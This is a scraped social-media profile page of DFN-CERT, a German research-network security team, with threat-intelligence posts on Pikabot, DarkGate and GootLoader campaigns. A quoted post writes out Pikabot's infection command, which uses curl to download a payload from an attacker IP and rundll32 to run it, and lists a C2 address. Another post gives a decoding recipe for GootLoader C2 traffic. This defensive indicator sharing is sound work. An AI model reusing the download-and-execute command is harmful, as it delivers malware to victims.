DFN-CERT | @[email protected]

11K posts

DFN-CERT | @dfncert@infosec.exchange banner
DFN-CERT | @dfncert@infosec.exchange

DFN-CERT | @[email protected]

@DFNCERT

THIS ACCOUNT IS NO LONGER ACTIVE! Serving the german NREN since 1993 RFC 2350 https://t.co/xPqFqKz0uy Imprint https://t.co/TEI3q3waTI

Hamburg เข้าร่วม Ocak 2015
32 กำลังติดตาม2K ผู้ติดตาม
DFN-CERT | @dfncert@infosec.exchange
Auch wir sehen vermehrt mit #Pikabot infizierte Systeme in unseren #Netflow Daten und informieren betroffenen Einrichtungen unmittelbar. 🤗
Cryptolaemus@Cryptolaemus1

#Pikabot - #TA577 - url > .zip > .js > curl > .dll wscript Cmejuzqk.js cmd /c cuRl http://216.128.185.]35/mdh/gunne -o %TMp%\XBMr.sct ruNdll32 %TMP%\XBMr.sct, Crash One new c2 added today👇full config in github. c2 188.26.127.4:13785 IOC's github.com/pr0xylife/Pika…

Deutsch
0
0
3
1.4K
DFN-CERT | @dfncert@infosec.exchange
Season starts early this year: major incidents in the German National Research and Education Network @DFN_de are piling up. Stay safe everyone and contact cert@dfn-cert.de if in trouble!
English
0
1
4
559
DFN-CERT | @[email protected] รีทวีตแล้ว
Deutsche Telekom CERT
Deutsche Telekom CERT@DTCERT·
On September 21st, 2023 Telekom Security CTI Team observed the threat actor #TA577, also known as "TR", launching a new high-volume malware distribution campaign spreading #DarkGate malware. 🧵 1/4
English
1
45
86
23.7K
ANY.RUN
ANY.RUN@anyrun_app·
📌#GootLoader is a loader distributed under a malware-as-a-service model #MaaS is an affiliate program that lowers the entry threshold for participants into malicious activities. 🤲To decode the traffic, we've specially crafted a recipe for you in #CyberChef Check out the submission - app.any.run/tasks/c0b41d04… 📄 Copy the entire Cookie field by clicking the 'Copy' button next to it: 🟩 - Check-in traffic is hidden in the Cookie field under five parameters. 📝 Next, paste the copied clipboard content into the #CyberChef input field: #recipe=Register('(%5BA-F0-9%5D%7B10%7D)',true,false,false)Fork('$R0','%5C%5Cn%5C%5Cn',false)Find_/_Replace%28%7B'option':'Regex','string':'%5E%5C%5Cd?%3D'%7D,'%20',true,false,true,false)From_Base64('A-Za-z0-9%2B/%3D',true,false)Gunzip%28%29&input=ODU2NTM5MUVDQT1INHNJQUFBQUFBQUVBSTJVWFcrYk1CU0cvd3JjYmRLR3VpYktwdWJLZ0JuZU1FYTJTWHFCakJoeE1qUUlDTk8xbGZqeHMwblVVclZLZDRIeCtiSmZIejhBb2lobGtMS0VrZ0JGVUhnM1dkSzNoNzVvL0dJb1Joc2tpUTg0TVA1VXlWNWx4YTZwamhub09oUFBhRnRvOHpEYVh0czA3ZkZjR2xTMVZMT2xyTW1SblhKT3hsc1ZIeDYrclQ2K0tyTW05NlhpN1dxNXVINTNPNEtUbEVNYUF3eUZPZkxueEp2V1laMHNUZkcyT3U3YWU1V3BSelhJWm5HZGxjM09rUTl5dElNa2owa2VFc1p6TDRUZVR4R1QwUTRKaGo1Rkc5T3lrNVVBSG9wNWwwWTdJaDZJM21saDFKWkZiVksvazFqTDJrQXFzdXhKWUp4aUY5S2NCTG0rSVE4eVJpZ1R5OUVtVEp3RjV6RWZiYk0zdk9YQzBjZGNPL0FXcmgwWDhMWGpZWC90YkZ4bUJ1Mzd3Y3lqSjFzV21DRmNPNWg1T2kySjlCcGtxMEVJWVJUbFBtS2NJamZsaU1UNnpDQ09ZU1F3UXpmblBhMnZsdTcxWGlwVnRVZWova2xjRHFnWElnNDlubElvQVBaWHkza1UrVERtS0VENmtGUE1DalEvOWFPMXNuQzdrN1gxWldteFFYYWRac3BhZkxMQTNmQmJIb2VxMU1uelpTSzQwWUpXY3hlRkc4UzBYSEVscnhZNjhBenhLNll2VXZveWZBbkpwOHkzK2RQaDFJMlE5M3p2eWQydnVpcEhtMDJFK1gzMVYwN3duR3phdHNPTXc5SG1FQ2NYb2NtNGJEcWQ5MzlwQmltZllJRGlaL3pOWlBvZ3pyd2FlL1luZU1IeXZkWlY5UzhVM3A4SkhQcWkxRGVXNyt2aW9NVGlkYUJ1RDN2ZEUxUHNicmlyRlhLcEJwVlZSelVVZGQwVjVaL2lJTE5TVmVkTVI3OE41RnVNQks3S3ZsWHRmckRlcHMvNkI2RFpxRW5FQkFBQTsgODU2NTM5MUVDQTE9SDRzSUFBQUFBQUFFQUNXTjBRcURNQXhGdjZYL01QWXU2b01QQTFISG5rV0RGdE9tSktYZG9CKy9TQWtrQis0SnQyMFJWZy84ZkJTemtUOUpvb0t3U0RGN2RzWEFOeUF4Y0RIRGpxRDcxWGREdTd6SHJsbjZZbERXVzBWUk5WQUdsaE1RaXhIZ1pEZlFTTnd0U0NCQ1NRcHBxeVh6VHlMb1YxemxBbjlVcUZHMlhxY0Mwa0crbUkvMVV6UHBkWGJrTkd0emRzRkR6TmNmL2wxQWpNSUFBQUE9OyA4NTY1MzkxRUNBMj1INHNJQUFBQUFBQUVBQVhCT3hKQVFCQUUwS3U0QUdYMm8yM29DZ0l5VmJhbnQ0cEFJbkI5NyszWHN5N3JzVjM2dXI1anJTVzV6MkNrWXN4RVZzWVVMRm1RbkJvdE5oSTRXWUtZMFNDa2t4amRaVmFHKy8wQjNnU0ZSVkVBQUFBPTsgODU2NTM5MUVDQTM9SDRzSUFBQUFBQUFFQUtXUnkwN0RNQkJGZnlYOWdhcHBXa3lYRUI0YlhnS0ovV1I4azdvNHRqVXhsS0IrUEJOb04yeForREZIOTQ2dk5XVWQrL1NlSVlkWitRd2UyYU80ZEVHck9vWXMwUmRQRk9DMUp0di84RHZYQ0luRGNKaFZmelVQeVBzb2I0ZlpzaUZQZ2JHak1FK2hVOENrUWhkb3Z4M25rdHVKTk0xbVplMjU0WXBSVldzMmE2ek4yYkpjbFV2QU1oWmwxVEliUTd4Wmd0ZW1OVEFyWXJPd0ZtVzVtZTgwUXZudkxsOHVUV0VzYUJoUFdXTVluSVdBeEovU1dzb3VkSTNvZGlKbzhzQU9JYnZXOGRIYTZoZTlIK0hCV1pUK1NydjRBUW05U2dXZU11eVI5N0NPRW8zelhack1TV0xyMU9tbnBzTVJDdnFZOGFIcmFCSU1XUi93Y2YrcldGeXd4SVp5OFF6UzBNVlZyYXl1UFhRb090YkZqUk8wOFZOdnR6RjJPdDk2SzdHSDF2ZE9uVU5zYzNGdHV3azhKZ2pwK2ZJMnBxbCt2YXVMbjR4RjhqUkN2Z0dweEhIU0xnSUFBQT09OyA4NTY1MzkxRUNBND1INHNJQUFBQUFBQUVBSE9PTTdFd3RUUzFNRFUzTWJBQUFKWStvd1VOQUFBQQ" target="_blank" rel="nofollow noopener">gchq.github.io/CyberChef/#rec… ✅ At last, get the information sent to the #GootLoader's C2
ANY.RUN tweet mediaANY.RUN tweet media
English
2
36
90
15.9K